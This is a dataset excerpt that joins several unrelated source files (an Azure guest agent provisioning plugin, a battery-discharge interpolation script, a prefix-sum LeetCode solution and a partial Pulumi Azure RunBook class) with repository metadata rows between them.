AzureGuestAgentPlugin._delete_event_trace(osutils, "GAEvents")
AzureGuestAgentPlugin._delete_event_trace(osutils, "RTEvents")
@staticmethod
def _get_guest_agent_source_path(osutils):
base_paths = osutils.get_logical_drives()
for base_path in base_paths:
path = os.path.join(base_path, GUEST_AGENT_SOURCE_PATH)
if os.path.exists(path):
return path
raise exception.CloudbaseInitException(
"Azure guest agent source folder not found")
def execute(self, service, shared_data):
provisioning_data = service.get_vm_agent_package_provisioning_data()
if not provisioning_data:
LOG.info("Azure guest agent provisioning data not present")
elif not provisioning_data.get("provision"):
LOG.info("Skipping Azure guest agent provisioning as by metadata "
"request")
else:
osutils = osutils_factory.get_os_utils()
self._remove_agent_services(osutils)
# TODO(alexpilotti): Check for processes that might still be
# running
self._remove_azure_dirs()
if not osutils.is_nano_server():
ga_package_name = provisioning_data.get("package_name")
if not ga_package_name:
raise exception.ItemNotFoundException(
"Azure guest agent package_name not found in metadata")
LOG.debug("Azure guest agent package name: %s",
ga_package_name)
ga_path = self._get_guest_agent_source_path(osutils)
ga_zip_path = os.path.join(ga_path, ga_package_name)
if not os.path.exists(ga_zip_path):
raise exception.CloudbaseInitException(
"Azure guest agent package file not found: %s" %
ga_zip_path)
self._stop_ga_event_traces(osutils)
self._delete_ga_event_traces(osutils)
ga_target_path = os.path.join(
os.getenv("SystemDrive"), '\\', GUEST_AGENT_ROOT_PATH,
"Packages")
if os.path.exists(ga_target_path):
shutil.rmtree(ga_target_path)
os.makedirs(ga_target_path)
with zipfile.ZipFile(ga_zip_path) as zf:
zf.extractall(ga_target_path)
self._configure_rd_agent(osutils, ga_target_path)
if not osutils.check_dotnet_is_installed("4"):
LOG.warn("The .Net framework 4.5 or greater is required "
"by the Azure guest agent")
else:
osutils.set_service_start_mode(
SERVICE_NAME_RDAGENT,
osutils.SERVICE_START_MODE_AUTOMATIC)
osutils.start_service(SERVICE_NAME_RDAGENT)
else:
vm_agent_target_path = os.path.join(
os.getenv("SystemDrive"), '\\', GUEST_AGENT_ROOT_PATH,
"Packages", "GuestAgent")
if not os.path.exists(vm_agent_target_path):
os.makedirs(vm_agent_target_path)
self._configure_vm_agent(osutils, vm_agent_target_path)
osutils.set_service_start_mode(
SERVICE_NAME_WAGUESTAGENT,
osutils.SERVICE_START_MODE_AUTOMATIC)
osutils.start_service(SERVICE_NAME_WAGUESTAGENT)
return base.PLUGIN_EXECUTION_DONE, False
def get_os_requirements(self):
return 'win32', (6, 1)
| 42.33209 | 79 | 0.627942 |
4a2121493155d4291ce6c7b3b79288bad52192d5 | 473 | py | Python | communication/CAN/SerialLog/test.py | OceanosTeam/Monaco2019 | d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6 | [
"Apache-2.0"
] | null | null | null | communication/CAN/SerialLog/test.py | OceanosTeam/Monaco2019 | d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6 | [
"Apache-2.0"
] | 1 | 2019-06-17T13:04:26.000Z | 2019-06-24T01:17:44.000Z | communication/CAN/SerialLog/test.py | OceanosTeam/Monaco2019 | d75fdc6f63e6c9e283d205b881d8aa06e1f61bc6 | [
"Apache-2.0"
] | 2 | 2019-06-14T14:14:23.000Z | 2019-06-21T15:58:00.000Z | #!/bin/python3
import time
import serial
from serial import Serial
from datetime import datetime
import struct
import sys
# from collections import namedtuple
import numpy as np
import mysql.connector as sql
from scipy import interpolate
Vdata = np.genfromtxt('oceanos_cell_discharge_capacity_14s.csv', dtype=float, delimiter=',', names=True)
vx = Vdata['voltage']
vy = Vdata['Percentage']
f = interpolate.interp1d(vx, vy)
# print(vx)
energy = f(57.0)
print(energy)
| 18.192308 | 104 | 0.769556 |
4a212238c72f48611b0eaadc8d1c0535b8894f50 | 636 | py | Python | problems/test_0303.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | 1 | 2017-06-17T23:47:17.000Z | 2017-06-17T23:47:17.000Z | problems/test_0303.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | problems/test_0303.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | import unittest
from typing import List
import utils
# O(n) space. DP, prefix.
class NumArray:
# O(n) time. O(1) space.
def __init__(self, nums: List[int]):
self.sums = [0] * len(nums)
sum_ = 0
for i in range(len(nums)):
sum_ += nums[i]
self.sums[i] = sum_
# O(1) time. O(1) space.
def sumRange(self, left: int, right: int) -> int:
return self.sums[right] - (self.sums[left - 1] if left > 0 else 0)
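# Worked example (illustrative values): nums = [-2, 0, 3, -5, 2, -1] gives
# sums = [-2, -2, 1, -4, -2, -3], so sumRange(0, 2) = sums[2] = 1 and
# sumRange(2, 5) = sums[5] - sums[1] = -3 - (-2) = -1.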
class Test(unittest.TestCase):
def test(self):
utils.test_invocations(self, __file__, NumArray)
if __name__ == '__main__':
unittest.main()
| 20.516129 | 74 | 0.581761 |
4a21224fb1308b28b73344ac8530dedf0a6a29f3 | 703 | py | Python | diversity/generate-comment-embeddings.py | VectorInstitute/projectpensive | 7fa78964ba7bd2d25892c99dd4cedb0d54f8d267 | [
"MIT"
] | 2 | 2021-09-08T01:59:10.000Z | 2021-09-29T02:20:58.000Z | diversity/generate-comment-embeddings.py | VectorInstitute/projectpensive | 7fa78964ba7bd2d25892c99dd4cedb0d54f8d267 | [
"MIT"
] | null | null | null | diversity/generate-comment-embeddings.py | VectorInstitute/projectpensive | 7fa78964ba7bd2d25892c99dd4cedb0d54f8d267 | [
"MIT"
] | 1 | 2021-09-29T02:21:04.000Z | 2021-09-29T02:21:04.000Z | import pandas as pd
import numpy as np
import torch
import time
from sentence_transformers import SentenceTransformer, util
if __name__ == "__main__":
# Open data
data = pd.read_csv('../civility/recommender/train-balanced-sarcasm-processed.csv')
corpus = data['comment'].to_list()
embedder = SentenceTransformer('paraphrase-MiniLM-L6-v2')
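    # paraphrase-MiniLM-L6-v2 encodes each comment into a 384-dimensional vector;
    # the imported `util` module can score pairs later, e.g. util.cos_sim(a, b).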
start_time = time.time()
# Generate Embeddings
sarcasm_embeddings = embedder.encode(corpus, convert_to_tensor=True)
end_time = time.time()
print("Time for computing embeddings:"+ str(end_time-start_time))
# Save embeddings to pickle file
torch.save(sarcasm_embeddings, 'datasets/sarcasm-embeddings-processed.pt') | 33.47619 | 86 | 0.739687 |
4a2123c02fadbcc2d395264907fc91ae27cf5e68 | 958 | py | Python | twitter_watcher/views.py | azubieta/cmtrends | 31b98e0e6ceed72f58cf831715ec56468c90386a | [
"Apache-2.0"
] | null | null | null | twitter_watcher/views.py | azubieta/cmtrends | 31b98e0e6ceed72f58cf831715ec56468c90386a | [
"Apache-2.0"
] | null | null | null | twitter_watcher/views.py | azubieta/cmtrends | 31b98e0e6ceed72f58cf831715ec56468c90386a | [
"Apache-2.0"
] | null | null | null | from django.template import RequestContext, loader
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
from django.http import HttpResponseRedirect, HttpResponse
from django.http import Http404
import stakeholders
import initiatives
import sys
import json
# Create your views here.
def index(request):
    context = {}  # e.g. {'latest_question_list': latest_question_list}
return render_to_response("index.html", context)
def recent_tweets(request):
tweets = initiatives.discover_tweets(0)
return HttpResponse(json.dumps(tweets))
# if request.is_ajax():
# try:
# tweets = initiatives.discover_tweets()
# return HttpResponse(json.dumps(tweets))
# #stakeholder = int(request.POST['stakeholder'])
# except KeyError:
# return HttpResponse('Error') # incorrect post
# else:
# raise Http404
def list_stakeholders():
    output = stakeholders.list_friends()
return HttpResponse(json.dumps(output))
| 22.809524 | 60 | 0.770355 |
4a212440761091540863017c2237b9dfdca5c58e | 4,064 | py | Python | venv/lib/python3.8/site-packages/ipykernel/parentpoller.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 7 | 2022-01-16T12:28:16.000Z | 2022-03-04T15:31:45.000Z | venv/lib/python3.8/site-packages/ipykernel/parentpoller.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 8 | 2021-09-22T12:47:32.000Z | 2022-01-14T21:30:38.000Z | venv/lib/python3.8/site-packages/ipykernel/parentpoller.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 1 | 2022-03-28T09:19:34.000Z | 2022-03-28T09:19:34.000Z | # Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
try:
import ctypes
except ImportError:
ctypes = None
import os
import platform
import signal
import time
from _thread import interrupt_main # Py 3
from threading import Thread
from traitlets.log import get_logger
import warnings
class ParentPollerUnix(Thread):
""" A Unix-specific daemon thread that terminates the program immediately
when the parent process no longer exists.
"""
def __init__(self):
super().__init__()
self.daemon = True
def run(self):
# We cannot use os.waitpid because it works only for child processes.
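        # Instead we poll os.getppid(): an orphaned Unix process is re-parented
        # to init (pid 1), so ppid == 1 means the parent has exited.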
from errno import EINTR
while True:
try:
if os.getppid() == 1:
get_logger().warning("Parent appears to have exited, shutting down.")
os._exit(1)
time.sleep(1.0)
except OSError as e:
if e.errno == EINTR:
continue
raise
class ParentPollerWindows(Thread):
""" A Windows-specific daemon thread that listens for a special event that
signals an interrupt and, optionally, terminates the program immediately
when the parent process no longer exists.
"""
def __init__(self, interrupt_handle=None, parent_handle=None):
""" Create the poller. At least one of the optional parameters must be
provided.
Parameters
----------
interrupt_handle : HANDLE (int), optional
If provided, the program will generate a Ctrl+C event when this
handle is signaled.
parent_handle : HANDLE (int), optional
If provided, the program will terminate immediately when this
handle is signaled.
"""
assert(interrupt_handle or parent_handle)
super().__init__()
if ctypes is None:
raise ImportError("ParentPollerWindows requires ctypes")
self.daemon = True
self.interrupt_handle = interrupt_handle
self.parent_handle = parent_handle
def run(self):
""" Run the poll loop. This method never returns.
"""
try:
from _winapi import WAIT_OBJECT_0, INFINITE
except ImportError:
from _subprocess import WAIT_OBJECT_0, INFINITE
# Build the list of handle to listen on.
handles = []
if self.interrupt_handle:
handles.append(self.interrupt_handle)
if self.parent_handle:
handles.append(self.parent_handle)
arch = platform.architecture()[0]
c_int = ctypes.c_int64 if arch.startswith('64') else ctypes.c_int
# Listen forever.
while True:
result = ctypes.windll.kernel32.WaitForMultipleObjects(
len(handles), # nCount
(c_int * len(handles))(*handles), # lpHandles
False, # bWaitAll
INFINITE) # dwMilliseconds
if WAIT_OBJECT_0 <= result < len(handles):
handle = handles[result - WAIT_OBJECT_0]
if handle == self.interrupt_handle:
# check if signal handler is callable
# to avoid 'int not callable' error (Python issue #23395)
if callable(signal.getsignal(signal.SIGINT)):
interrupt_main()
elif handle == self.parent_handle:
get_logger().warning("Parent appears to have exited, shutting down.")
os._exit(1)
elif result < 0:
# wait failed, just give up and stop polling.
warnings.warn("""Parent poll failed. If the frontend dies,
the kernel may be left running. Please let us know
about your system (bitness, Python, etc.) at
[email protected]""")
return
| 35.649123 | 89 | 0.581201 |
4a2124bdc5b263152901579b28e8c9156043b1ae | 8,666 | py | Python | eval/coherence.py | L-Zhe/CoRPG | aa7a14a2b1c5397b327b4f91846795f7956bf2cd | [
"MIT"
] | 13 | 2021-09-15T05:44:05.000Z | 2022-03-24T12:24:00.000Z | eval/coherence.py | L-Zhe/CoRPG | aa7a14a2b1c5397b327b4f91846795f7956bf2cd | [
"MIT"
] | null | null | null | eval/coherence.py | L-Zhe/CoRPG | aa7a14a2b1c5397b327b4f91846795f7956bf2cd | [
"MIT"
] | 4 | 2021-09-17T20:00:48.000Z | 2022-03-10T03:09:57.000Z | from transformers import AlbertTokenizer, AlbertForPreTraining
import torch
from torch import nn
from torch.nn import functional as F
from tqdm import tqdm
import random
import time
import torch_optimizer as optim
import argparse
from nltk.tokenize import sent_tokenize
def split_sent(sent):
ans = list(sent_tokenize(sent))
return ans
def read(file, split=False):
with open(file, 'r') as f:
if split:
return [[seq for seq in split_sent(line.strip('\n').strip())] for line in f.readlines()]
else:
return [line.strip('\n').strip().split('\t') for line in f.readlines()]
def write(data, file):
with open(file, 'w') as f:
for line in data:
f.write(line)
f.write('\n')
@torch.no_grad()
def cal_graph(data=None, pretrain_model=None):
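    # Scores every ordered sentence pair in each document with ALBERT's
    # sentence-order-prediction (SOP) head, yielding a flattened n*n
    # coherence graph (one probability per pair) per document.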
tokenizer = AlbertTokenizer.from_pretrained(pretrain_model)
model = AlbertForPreTraining.from_pretrained(pretrain_model).cuda()
model.eval()
graph = []
prompt = []
next_sentence = []
for seq in tqdm(data):
for i in range(len(seq)):
for j in range(len(seq)):
prompt.append(seq[i])
next_sentence.append(seq[j])
encoding = move2cuda(tokenizer(prompt, next_sentence, return_tensors='pt',
add_special_tokens=True, padding=True))
outputs = model(**encoding, labels=torch.LongTensor([1] * len(prompt)).cuda())
logits = outputs.sop_logits
prob = F.softmax(logits, dim=-1)[:, 1].view(-1, len(seq) ** 2)
_tmp = [' '.join([str(num) for num in line]) for line in prob.tolist()]
graph.extend(_tmp)
prompt = []
next_sentence = []
# if len(prompt) != 0:
# encoding = move2cuda(tokenizer(prompt, next_sentence, return_tensors='pt',
# add_special_tokens=True, padding=True))
# outputs = model(**encoding, labels=torch.LongTensor([1] * len(prompt)).cuda())
# logits = outputs.sop_logits
# prob = F.softmax(logits, dim=-1)[:, 1].view(-1, 25)
# _tmp = [' '.join([str(num) for num in line]) for line in prob.tolist()]
# graph.extend(_tmp)
return graph
@torch.no_grad()
def COH(data, pretrain_model):
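    # COH = fraction of adjacent sentence pairs the SOP head judges coherent
    # (probability > 0.5); COH-p = mean SOP probability over those pairs.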
tokenizer = AlbertTokenizer.from_pretrained(pretrain_model)
model = AlbertForPreTraining.from_pretrained(pretrain_model).cuda()
model.eval()
total_prob = 0
total_cnt = 0
prompt = []
next_sentence = []
cnt = 0
for seq in tqdm(data):
for i in range(len(seq) - 1):
prompt.append(seq[i])
next_sentence.append(seq[i + 1])
# print(len(seq))
if len(seq) > 1:
encoding = move2cuda(tokenizer(prompt, next_sentence, return_tensors='pt',
add_special_tokens=True, padding=True))
outputs = model(**encoding, labels=torch.LongTensor([1] * len(prompt)).cuda())
logits = outputs.sop_logits
prob = F.softmax(logits, dim=-1)[:, 1].view(-1, len(seq) - 1)
total_prob += prob.mean(dim=1).item()
total_cnt += (prob > 0.5).float().mean(dim=-1).item()
else:
cnt += 1
prompt = []
next_sentence = []
print("COH-p: %f\tCOH: %f" % (total_prob / (len(data) - cnt), total_cnt / (len(data) - cnt)))
def data_process(file, train_num=30000, test_num=1000):
with open(file, 'r') as f:
corpus = [[seq.lower().strip() for seq in line.strip('\n').strip().split('\t')] for line in f.readlines()]
data = []
for line in corpus:
for i in range(len(line) - 1):
data.append((line[i], line[i + 1]))
random.shuffle(data)
return data[:train_num], data[train_num:test_num + train_num]
def data_loader(data, batch_size):
st = 0
ed = batch_size
random.shuffle(data)
while st < len(data):
_data = data[st:ed]
st = ed
ed = min(ed + batch_size, len(data))
yield _data
def move2cuda(data):
for key in data.keys():
if data[key].size(1) > 512:
data[key] = data[key][:, :512]
data[key] = data[key].cuda()
return data
def train(model,
tokenizer,
criterion,
optim,
train_data,
test_data,
batch_size,
epoch,
checkpoint_path,
grad_accum_step):
model.train()
best_score = 0
for e in range(epoch):
total_loss = 0
total_cnt = 0
accum_cnt = 0
st_time = time.time()
for i, data in enumerate(data_loader(train_data, batch_size)):
optim.zero_grad()
prompt, next_sentence = zip(*data)
label_true = torch.ones(len(data)).long().cuda()
label_false = torch.zeros(len(data)).long().cuda()
input_true = tokenizer(prompt, next_sentence, return_tensors='pt',
padding=True, add_special_tokens=True)
output_true = model(**move2cuda(input_true)).sop_logits
loss_true = criterion(output_true, label_true) / 2
total_loss += loss_true.item()
loss_true.backward()
input_false = tokenizer(next_sentence, prompt, return_tensors='pt',
padding=True, add_special_tokens=True)
output_false = model(**move2cuda(input_false)).sop_logits
loss_false = criterion(output_false, label_false) / 2
total_loss += loss_false.item()
loss_false.backward()
accum_cnt += 1
if accum_cnt == grad_accum_step:
optim.step()
accum_cnt = 0
total_cnt += 1
if i % (10 * grad_accum_step) == 0:
print("epoch: %d\tbatch: %d\tloss: %f\ttime: %d\tbest_acc: %f%%"
% (e, i, total_loss / total_cnt, time.time() - st_time, best_score * 100))
total_loss = total_cnt = 0
st_time = time.time()
if accum_cnt != 0:
optim.step()
with torch.no_grad():
model.eval()
total_true = 0
total_cnt = 0
for data in tqdm(data_loader(test_data, batch_size)):
prompt, next_sentence = zip(*data)
input_true = tokenizer(prompt, next_sentence, return_tensors='pt',
padding=True, add_special_tokens=True)
output_true = model(**move2cuda(input_true)).sop_logits
total_true += (F.softmax(output_true, dim=-1)[:, 0] < 0.5).long().sum().item()
input_false = tokenizer(next_sentence, prompt, return_tensors='pt',
padding=True, add_special_tokens=True)
output_false = model(**move2cuda(input_false)).sop_logits
total_true += (F.softmax(output_false, dim=-1)[:, 0] > 0.5).long().sum().item()
total_cnt += 2 * len(data)
acc = total_true / total_cnt
print("valid acc: %f" % acc)
if best_score <= acc:
best_score = acc
torch.save(model.state_dict(), checkpoint_path)
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--train', action='store_true')
parser.add_argument('--inference', action='store_true')
parser.add_argument('--coh', action='store_true')
parser.add_argument('--pretrain_model', type=str)
parser.add_argument('--save_file', type=str, default=None)
parser.add_argument('--text_file', type=str)
return parser.parse_args()
if __name__ == '__main__':
args = get_parser()
if args.train:
tokenizer = AlbertTokenizer.from_pretrained(args.pretrain_model)
model = AlbertForPreTraining.from_pretrained(args.pretrain_model).cuda()
train_data, test_data = data_process(args.text_file)
criterion = nn.CrossEntropyLoss(reduction='mean')
optimizer = optim.Lamb(model.parameters(), lr=0.00176)
train(model=model,
tokenizer=tokenizer,
criterion=criterion,
optim=optimizer,
train_data=train_data,
test_data=test_data,
batch_size=128,
epoch=100,
checkpoint_path=args.save_file,
grad_accum_step=2)
    elif args.inference:
# inference:
file = args.text_file
write(cal_graph(read(file), args.pretrain_model), file + '.graph')
# COH score
    elif args.coh:
COH(read(args.text_file, split=True), args.pretrain_model)
| 39.21267 | 114 | 0.575583 |
4a2125942fcf2b69dee3cef9824c769679654583 | 3,098 | py | Python | app/cfg.py | frodejac/fastapi-postgres-celery | eddc9518a310d30011ce113fd1d0de6a9b027ad3 | [
"MIT"
] | null | null | null | app/cfg.py | frodejac/fastapi-postgres-celery | eddc9518a310d30011ce113fd1d0de6a9b027ad3 | [
"MIT"
] | null | null | null | app/cfg.py | frodejac/fastapi-postgres-celery | eddc9518a310d30011ce113fd1d0de6a9b027ad3 | [
"MIT"
] | null | null | null | from __future__ import annotations
import environs
from app.utils.singleton import Singleton
env: environs.Env = environs.Env()
env.read_env()
class AppConfig(metaclass=Singleton):
# App config
# SERVICE_NAME is set as an environment variable with Terraform
APP_TITLE: str = env.str("SERVICE_NAME", "app-api")
APP_API_V1_PREFIX: str = env.str("APP_OPENAPI_V1_PREFIX", "/api/v1")
APP_OPENAPI_URL: str = env.str(
"APP_OPENAPI_URL", f"{APP_API_V1_PREFIX}/openapi.json"
)
APP_DEBUG: bool = env.bool("APP_DEBUG", False)
API_DEFAULT_ORDER_BY: str = env.str("API_DEFAULT_ORDER_BY", "created_date")
API_DEFAULT_ORDER_DIR: str = env.str("API_DEFAULT_ORDER_DIR", "desc")
API_DEFAULT_LIMIT: int = env.int("API_DEFAULT_LIMIT", 50)
API_DEFAULT_PAGE: int = env.int("API_DEFAULT_PAGE", 0)
API_HOST: str = env.str("APP_API_HOST", "localhost")
API_PORT: str = env.str("APP_API_PORT", "80")
# DB config
POSTGRES_USER: str = env.str("POSTGRES_USER", "")
POSTGRES_PASSWORD: str = env.str("POSTGRES_PASSWORD", "")
POSTGRES_HOST: str = env.str("POSTGRES_HOST", "")
POSTGRES_PORT: int = env.int("POSTGRES_PORT", 5432)
POSTGRES_NAME: str = env.str("POSTGRES_NAME", "")
# noinspection PyPep8Naming
@property
def SQLALCHEMY_DATABASE_URI(self):
if uri := env("SQLALCHEMY_DATABASE_URI", None):
return uri
_db_credentials = ""
if self.POSTGRES_USER and self.POSTGRES_PASSWORD:
_db_credentials = "{user}:{pwd}".format(
user=self.POSTGRES_USER, pwd=self.POSTGRES_PASSWORD
)
elif self.POSTGRES_USER:
_db_credentials = self.POSTGRES_USER
        # Build the SQLAlchemy connection URI
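        # e.g. postgresql+psycopg2://app_user:secret@db-host:5432/app_db (hypothetical values)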
return "postgresql+psycopg2://{credentials}@{host}:{port}/{dbname}".format(
credentials=_db_credentials,
host=self.POSTGRES_HOST,
port=self.POSTGRES_PORT,
dbname=self.POSTGRES_NAME,
)
SQLALCHEMY_POOL_SIZE: int = env.int("SQLACLHEMY_POOL_SIZE", 10)
# Redis config
REDIS_HOST: str = env.str("REDIS_HOST", "localhost")
REDIS_PORT: int = env.int("REDIS_PORT", 6379)
REDIS_USER: str = env.str("REDIS_USER", "")
REDIS_PASS: str = env.str("REDIS_PASS", "")
# noinspection PyPep8Naming
@property
def CELERY_BROKER_URI(self):
if uri := env("CELERY_BROKER_URI", None):
return uri
_redis_credentials = ""
if self.REDIS_USER and self.REDIS_PASS:
_redis_credentials = f"{self.REDIS_USER}:{self.REDIS_PASS}"
elif self.REDIS_USER:
_redis_credentials = self.REDIS_USER
return "redis://{credentials}{host}:{port}".format(
credentials=f"{_redis_credentials}@" if _redis_credentials else "",
host=self.REDIS_HOST,
port=self.REDIS_PORT,
)
def __repr__(self):
return "\n".join(
[f"{k}: {getattr(self, k)}" for k in dir(self) if not k.startswith("_")]
)
def __str__(self):
return repr(self)
config = AppConfig()
| 33.311828 | 84 | 0.642995 |
4a21267a5afca84d7f15ccd48d4f1afc842c731f | 1,155 | py | Python | examples/example_vertex_voronoi.py | Brain-Slam/slam | a4ab0aec53f83f2b8947b8be8647b90711a795c3 | [
"MIT"
] | null | null | null | examples/example_vertex_voronoi.py | Brain-Slam/slam | a4ab0aec53f83f2b8947b8be8647b90711a795c3 | [
"MIT"
] | null | null | null | examples/example_vertex_voronoi.py | Brain-Slam/slam | a4ab0aec53f83f2b8947b8be8647b90711a795c3 | [
"MIT"
] | null | null | null | """
.. _example_vertex_voronoi:
===================================
Vertex voronoi example in slam
===================================
"""
# Authors:
# Guillaume Auzias <[email protected]>
# Julien Barrès <[email protected]>
# License: BSD (3-clause)
# sphinx_gallery_thumbnail_number = 2
###############################################################################
# Importation of slam modules
import slam.io as sio
import slam.plot as splt
import slam.vertex_voronoi as svv
import numpy as np
###############################################################################
#
mesh = sio.load_mesh("../examples/data/example_mesh.gii")
mesh.apply_transform(mesh.principal_inertia_transform)
###############################################################################
#
vert_vor = svv.vertex_voronoi(mesh)
print(mesh.vertices.shape)
print(vert_vor.shape)
print(np.sum(vert_vor) - mesh.area)
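# The per-vertex Voronoi areas partition the surface, so their sum should match
# the total mesh area (the difference printed above should be ~0).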
###############################################################################
# Visualization
visb_sc = splt.visbrain_plot(
mesh=mesh, tex=vert_vor, caption="vertex voronoi", cblabel="vertex voronoi"
)
visb_sc.preview()
| 26.860465 | 79 | 0.504762 |
4a21270a2f1c7564b4c6ed385b96519e875c0593 | 1,027 | py | Python | tensor2tensor/bin/translate_generate_all.py | cgebe/tensor2tensor | 8e2389021643774f81a3af643e55a856896aef5c | [
"Apache-2.0"
] | null | null | null | tensor2tensor/bin/translate_generate_all.py | cgebe/tensor2tensor | 8e2389021643774f81a3af643e55a856896aef5c | [
"Apache-2.0"
] | null | null | null | tensor2tensor/bin/translate_generate_all.py | cgebe/tensor2tensor | 8e2389021643774f81a3af643e55a856896aef5c | [
"Apache-2.0"
] | 1 | 2018-07-26T18:31:58.000Z | 2018-07-26T18:31:58.000Z | import os
TRANSLATE_PROBLEMS = [
"translate_csde_legal32k",
#"translate_csen_legal32k",
#"translate_cses_legal32k",
#"translate_csfr_legal32k",
#"translate_csit_legal32k",
#"translate_cssv_legal32k",
#"translate_deen_legal32k",
#"translate_dees_legal32k",
#"translate_defr_legal32k",
#"translate_deit_legal32k",
#"translate_desv_legal32k",
"translate_enes_legal32k",
#"translate_enfr_legal32k",
#"translate_enit_legal32k",
#"translate_ensv_legal32k",
"translate_esfr_legal32k",
#"translate_esit_legal32k",
#"translate_essv_legal32k",
"translate_frit_legal32k",
#"translate_frsv_legal32k",
"translate_itsv_legal32k"
]
def main():
for problem in TRANSLATE_PROBLEMS:
os.system("mkdir -p $DATA_DIR/translate/" + problem)
if os.system("python ./t2t-datagen --data_dir=$DATA_DIR --tmp_dir=$TMP_DIR --problem=" + problem) == 0:
continue
else:
print "ERROR " + problem
break
main()
| 26.333333 | 111 | 0.674781 |
4a212902dcd5f7bac65f0d511aa162f0f935fa05 | 1,334 | py | Python | iscc_core/__init__.py | iscc/iscc-core | 45cfb0c092ffb8dc97d926528cb2b16aa20e2c43 | [
"Apache-2.0"
] | 5 | 2021-08-31T19:06:57.000Z | 2022-01-13T16:11:22.000Z | iscc_core/__init__.py | iscc/iscc-core | 45cfb0c092ffb8dc97d926528cb2b16aa20e2c43 | [
"Apache-2.0"
] | 54 | 2021-12-25T11:25:09.000Z | 2022-03-03T09:04:31.000Z | iscc_core/__init__.py | iscc/iscc-core | 45cfb0c092ffb8dc97d926528cb2b16aa20e2c43 | [
"Apache-2.0"
] | null | null | null | __version__ = "0.2.0"
from iscc_core import options
core_opts = options.CoreOptions()
options_conformant = options.check_options(core_opts)
from iscc_core import conformance
from iscc_core.constants import *
from iscc_core.simhash import *
from iscc_core.minhash import *
from iscc_core.wtahash import *
from iscc_core.dct import *
from iscc_core.cdc import *
from iscc_core.iscc_code import (
gen_iscc_code,
gen_iscc_code_v0,
)
from iscc_core.iscc_id import (
gen_iscc_id,
gen_iscc_id_v0,
)
from iscc_core.code_meta import (
gen_meta_code,
gen_meta_code_v0,
)
from iscc_core.code_content_text import (
gen_text_code,
gen_text_code_v0,
collapse_text,
)
from iscc_core.code_content_image import (
gen_image_code,
gen_image_code_v0,
soft_hash_image_v0,
)
from iscc_core.code_content_audio import (
gen_audio_code,
gen_audio_code_v0,
)
from iscc_core.code_content_video import (
gen_video_code,
gen_video_code_v0,
)
from iscc_core.code_content_mixed import (
gen_mixed_code,
gen_mixed_code_v0,
)
from iscc_core.code_data import (
gen_data_code,
gen_data_code_v0,
)
from iscc_core.code_instance import gen_instance_code, gen_instance_code_v0, InstanceHasherV0
from iscc_core.codec import *
from iscc_core.utils import *
from iscc_core.models import Code
| 23 | 93 | 0.784108 |
4a2129a472b3a4d5361202a7fd9542e5337b1cc2 | 33,471 | py | Python | sdk/python/pulumi_azure/automation/run_book.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/automation/run_book.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/automation/run_book.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RunBookArgs', 'RunBook']
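# A minimal usage sketch (hypothetical values), based on the arguments below:
#
#     import pulumi_azure as azure
#
#     example = azure.automation.RunBook("example",
#         resource_group_name="example-rg",
#         automation_account_name="example-account",
#         location="West Europe",
#         log_verbose=True,
#         log_progress=True,
#         runbook_type="PowerShell",
#         content="Write-Output 'Hello'")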
@pulumi.input_type
class RunBookArgs:
def __init__(__self__, *,
automation_account_name: pulumi.Input[str],
log_progress: pulumi.Input[bool],
log_verbose: pulumi.Input[bool],
resource_group_name: pulumi.Input[str],
runbook_type: pulumi.Input[str],
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input['RunBookPublishContentLinkArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a RunBook resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Progress log option.
:param pulumi.Input[bool] log_verbose: Verbose log option.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this credential.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input['RunBookPublishContentLinkArgs'] publish_content_link: The published runbook content link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
